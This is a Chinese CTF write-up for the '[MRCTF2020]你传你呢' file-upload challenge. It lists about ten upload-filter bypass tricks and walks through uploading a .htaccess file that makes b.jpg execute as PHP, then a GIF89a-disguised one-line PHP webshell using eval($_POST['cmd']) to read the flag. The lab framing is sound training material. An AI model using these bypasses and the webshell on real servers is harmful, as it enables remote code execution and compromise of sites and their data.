首页 > 其他分享 >[MRCTF2020]你传你呢

[MRCTF2020]你传你呢

时间:2023-11-15 09:22:05浏览次数:35  
标签:文件 后缀 修改 绕过 php 抓包 MRCTF2020

是文件上传漏洞,对于文件上传漏洞,参考师傅们的文章做个简单的总结

1、前端绕过,抓包修改后缀名,
2、文件内容绕过,用图片马,抓包修改后缀绕过
3、黑名单绕过,那么我们可以改成phtml抓包绕过
4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”
5、大小写绕过,抓包后修改后缀为.PHp
6、空格绕过,抓包修改后缀,在后缀后面加上空格
7、点绕过,抓包修改后缀,在后缀后面加上点(删掉空格还可以. .或者 . )
8、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,
9、双拼绕过,抓包修改后缀,并在把后缀改成pphphp,这样后端去掉php,还剩下个p和hp组合在一起,又是php
10、.user.ini配置文件绕过

直接传php文件不行,抓包绕过一下前端,把各种双写,大小写,空格绕过都试一遍,回显都是

43XZxFFJpQnXYyuwgvVx0N-lj8pqwLXqDbWqoTTCjZ8

这个时候需要通过htaccess绕过,上传.htaccess文件

<FilesMatch "b.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

eDR0UWuyB_madC0MvFWsc5PidZ8HT8mJDwLQC9ttYYc

类型需要改成image/jpeg,否则仍然不会通过,因为不是在白名单中的后缀名

N_uDhN5yw9gMa7PUZDDbv1V6Gd_IY8gcpQ6RfXBufbo

接下来上传一句话木马

GIF89a
<?=eval($_POST['cmd']);?>

9XgUDPcoaqrkRdgxBf92NmDXApC2FVeYBnqJNPx1hbQ

http://e41a6a14-5c3a-45ed-a88e-017456a80e5e.node4.buuoj.cn:81/upload/277e17433606e023e817bcd9c4025473/b.jpg

Ze675HjSsKmuWeKZTmTRyQLagBDRKLE182W3gvY6iOk

测试连接成功

585bxJq7UloeziFIH6Jw1odFyHogSm8hpc1Er9QiBPA

根目录下找到flag

DSmFDpRjjiMWtyJRW-M_7u0uAwrQahHmFtsQwXldwpE

flag{460a2117-0868-4753-9942-95c01327fa91}

标签:文件,后缀,修改,绕过,php,抓包,MRCTF2020
From: https://www.cnblogs.com/fishjumpriver/p/17833108.html

相关文章

  • [MRCTF2020]Ez_bypass
    打开题目后得到源码,可以使用PHP代码在线格式化一下,方便阅读。源码如下。$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){$id=$_GET['id'];$gg=$_GET['gg'];if(md5($id)==......
  • [MRCTF2020]你传你呢
    打开题目如下。本题有坑点,就算是使用mspaint随意生成一个jpg图片进行上传,仍然提示:我扌yourproblem?。后面查看了wp,发现是对上传内容的大小存在限制。经尝试,使用php、phtml、php5等多种后缀都无法绕过检测,但可以上传.htaccess文件(.htaccess是Apache使用的一种配置......
  • [MRCTF2020]Ezpop
    原理反序列化解题过程记得tostring的触发方式!还有urlencode只要是通过get请求,参数记得url编码https://blog.csdn.net/pakho_C/article/details/126057111......
  • [MRCTF2020]你传你呢
    原理.htaccess文件解析漏洞以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦--手搓连接木马的系统命令多种使用方式payload:var_dump(scandir('/'));echofile_get_contents('/flag');解题过程进入靶场,让上传文件上传文件抓包,发现包被过......
  • BUUCTF:[MRCTF2020]Ez_bypass
    https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass右键查看源代码include'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){$id=$_GET['id'];$gg=$_GET......
  • BUUCTF: [MRCTF2020]Ezpop
    https://buuoj.cn/challenges#[MRCTF2020]Ezpop<?phpclassModifier{protected$var;publicfunctionappend($value){include($value);}publicfunction__invoke(){$this->append($this->var);}}classShow{......
  • MISC|[MRCTF2020]Unravel!!
    解压得到三个文件其中有一个音频叫Look_at_the_file_ending.wav,暗示看文件尾部,使用010editor打开发现key,应该是压缩包的解压密码,但是直接试失败key=U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=查看JM.png文件发现尾部有压缩包使用foremost分离得到图片,图片名称为aes......
  • WEB|[MRCTF2020]套娃
    查看网页源码发现代码$query=$_SERVER['QUERY_STRING'];if(substr_count($query,'_')!==0||substr_count($query,'%5f')!=0){die('Y0uareSocutE!');}if($_GET['b_u_p_t']!=='23333'&&am......
  • [MRCTF2020]Transform 1
    查壳:64位,先看看运行有问题吗:任意输入给你弹了一个wrong进IDA看看:解释:输入一个字符串,要满足字符串的长度为33,不然就报错。接下来是在输入的字符串中拿出特定的字符,进行异或后得到一个新的字符串,最后与特定的字符串对比。这样看来,我们先看要对比的字符串:还不短,但是我们只......
  • [MRCTF2020]Ezpop
    1.解题过程1.题目源代码<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%......